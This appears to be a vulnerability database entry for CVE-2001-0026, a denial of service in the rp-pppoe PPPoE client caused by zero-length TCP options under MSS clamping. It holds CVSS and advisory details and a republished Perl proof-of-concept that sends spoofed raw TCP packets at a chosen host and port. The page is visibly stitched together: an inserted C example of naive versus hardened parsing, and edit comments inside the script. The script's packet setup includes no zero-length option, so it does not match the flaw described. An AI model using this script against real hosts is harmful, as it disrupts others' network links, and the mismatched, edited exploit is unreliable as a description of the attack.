CVE-2001-0026
CVSS 5.0
Published: 2001-02-12 00:00:00
Revised: 2008-09-05 16:23:05
NMCOE

[Original text] rp-pppoe PPPoE client allows remote attackers to cause a denial of service via the Clamp MSS option and a TCP packet with a zero-length TCP option.


[CNNVD] rp-pppoe PPPoE Client Vulnerability (CNNVD-200102-065)

        A vulnerability exists in the rp-pppoe PPPoE client. A remote attacker can cause a denial of service by means of the Clamp MSS option and a TCP packet carrying a zero-length TCP option.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:roaring_penguin:pppoe:2.1
cpe:/a:roaring_penguin:pppoe:2.4
cpe:/a:roaring_penguin:pppoe:2.2
cpe:/a:roaring_penguin:pppoe:2.3
cpe:/a:roaring_penguin:pppoe:2.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0026
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0026
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200102-065
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/2098
(VENDOR_ADVISORY)  BID  2098
http://www.redhat.com/support/errata/RHSA-2000-130.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2000:130
http://archives.neohapsis.com/archives/bugtraq/2000-12/0134.html
(VENDOR_ADVISORY)  BUGTRAQ  20001211 DoS vulnerability in rp-pppoe versions <= 2.4
http://xforce.iss.net/static/5727.php
(VENDOR_ADVISORY)  XF  rppppoe-zero-length-dos
http://www.linux-mandrake.com/en/security/MDKSA-2000-084.php3
(UNKNOWN)  MANDRAKE  MDKSA-2000:084
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000357
(UNKNOWN)  CONECTIVA  CLA-2000:357

- Vulnerability information

rp-pppoe PPPoE Client Vulnerability
Medium  Unknown
2001-02-12 00:00:00 2005-05-02 00:00:00
Remote
        A vulnerability exists in the rp-pppoe PPPoE client. A remote attacker can cause a denial of service by means of the Clamp MSS option and a TCP packet carrying a zero-length TCP option.

- Advisories and patches

- Vulnerability information (20494)

RedHat Linux 7.0 Roaring Penguin PPPoE Denial of Service Vulnerability (EDBID:20494)
linux remote
2000-12-11 Verified
0 dethy
N/A
source: http://www.securityfocus.com/bid/2098/info

Roaring Penguin Software's PPPoE is a freeware PPP over Ethernet client often used by ADSL subscribers running Linux or NetBSD.

PPPoE contains a possibly remotely exploitable denial of service vulnerability in its handling of TCP packets when the Clamp_MSS option is used. If PPPoE receives a malformed TCP packet with a "zero-length option", PPPoE will go into an infinite loop. As a result, the PPP connection being supported by PPPoE will time out and be terminated. A manual restart is needed to regain functionality.

This bug has been fixed by Roaring Penguin Software in a new version, see the solutions section. 
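As an added illustration (not rp-pppoe's code; the names naive_walk_steps and clamp_mss are hypothetical), the kind of TCP option walk the advisory describes is shown beside the hardened walk an MSS-clamping hook should use: the naive loop trusts the option length byte and stalls on a zero-length option, while the hardened version rejects it before it can loop.

```c
#include <stddef.h>
#include <stdint.h>

#define TCPOPT_EOL 0
#define TCPOPT_NOP 1
#define TCPOPT_MSS 2

/* Option walk of the kind the advisory describes: it trusts the length
 * byte, so a zero-length option never advances the cursor and the loop
 * spins forever. max_steps bounds it here only so it can be observed;
 * returns the number of iterations taken. (Hypothetical, not rp-pppoe code.) */
int naive_walk_steps(const uint8_t *opts, size_t len, int max_steps) {
    size_t i = 0;
    int steps = 0;
    while (i + 1 < len && steps < max_steps) {
        steps++;
        if (opts[i] == TCPOPT_EOL) break;
        if (opts[i] == TCPOPT_NOP) { i++; continue; }
        i += opts[i + 1];               /* BUG: length 0 leaves i unchanged */
    }
    return steps;
}

/* Hardened walk: rejects zero/one-length options and options that overrun
 * the option area, then clamps the MSS in place if it exceeds max_mss.
 * Returns 1 if clamped, 0 if nothing to do, -1 if the options are malformed. */
int clamp_mss(uint8_t *opts, size_t len, uint16_t max_mss) {
    size_t i = 0;
    while (i < len) {
        uint8_t kind = opts[i];
        if (kind == TCPOPT_EOL) return 0;
        if (kind == TCPOPT_NOP) { i++; continue; }
        if (i + 1 >= len) return -1;                   /* no length byte */
        uint8_t optlen = opts[i + 1];
        if (optlen < 2 || i + optlen > len) return -1; /* zero-length or truncated */
        if (kind == TCPOPT_MSS) {
            if (optlen != 4) return -1;
            uint16_t mss = (uint16_t)((opts[i + 2] << 8) | opts[i + 3]);
            if (mss <= max_mss) return 0;
            opts[i + 2] = (uint8_t)(max_mss >> 8);
            opts[i + 3] = (uint8_t)(max_mss & 0xff);
            return 1;
        }
        i += optlen;                                   /* always advances: optlen >= 2 */
    }
    return 0;
}
```

A caller that gets -1 should drop the packet or pass it through unclamped rather than retry; the point is that a malformed length must terminate the walk.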

#!/usr/bin/perl
# POC script that causes a DoS in a PPP-over-Ethernet link, in RedHat 7.0.
# Advisory: http://www.redhat.com/support/errata/RHSA-2000-130.html
# by dethy
use Net::RawIP;
use Getopt::Std;
# -c takes a value (the packet count), so it needs a trailing colon like the other options
getopts('d:s:p:c:',\%args) || &usage;
if(defined($args{d})){$daddr=$args{d};}else{&usage;}
if(defined($args{s})){$src=$args{s};}else{$src=&randsrc;}
if(defined($args{p})){$port=$args{p};}else{&usage;}   # was $port{p}, a hash that is never set
if(defined($args{c})){$count=$args{c};}else{$count=10;}
$sport=&randport;   # the original never called randport, so $sport was undefined

sub randport(){
 srand;
 return $sport=(int rand 65510);
 }

sub randsrc(){
  srand;
  return $saddr=(int rand 255).".".(int rand 255).".".(int rand 255).".".(int rand 255);
 }

 # Build an IP/TCP packet with the chosen addresses and ports, SYN and PSH set
 $packet = new Net::RawIP({ip=>{},tcp=>{}});
 $packet->set({ ip => { saddr => $src,
			daddr => $daddr,
			tos => 3 },
               tcp => { source => $sport,
			dest => $port,
                        syn => 1, psh => 1 } });

 # send(delay, count): send $count copies with no delay between them
 $packet->send(0,$count);

sub usage(){ die("pppoe-link POC DoS on RH7\n$0 -d <dest> -s <source> -p <port> -c <count>\n"); }


- Vulnerability information

1688
Roaring Penguin PPPoE Zero-length Option Handling Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public Uncoordinated Disclosure

- Vulnerability description

- Timeline

2000-12-11 Unknown
2000-12-11 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese open community in China devoted to SCAP. For more information, see [About this site].
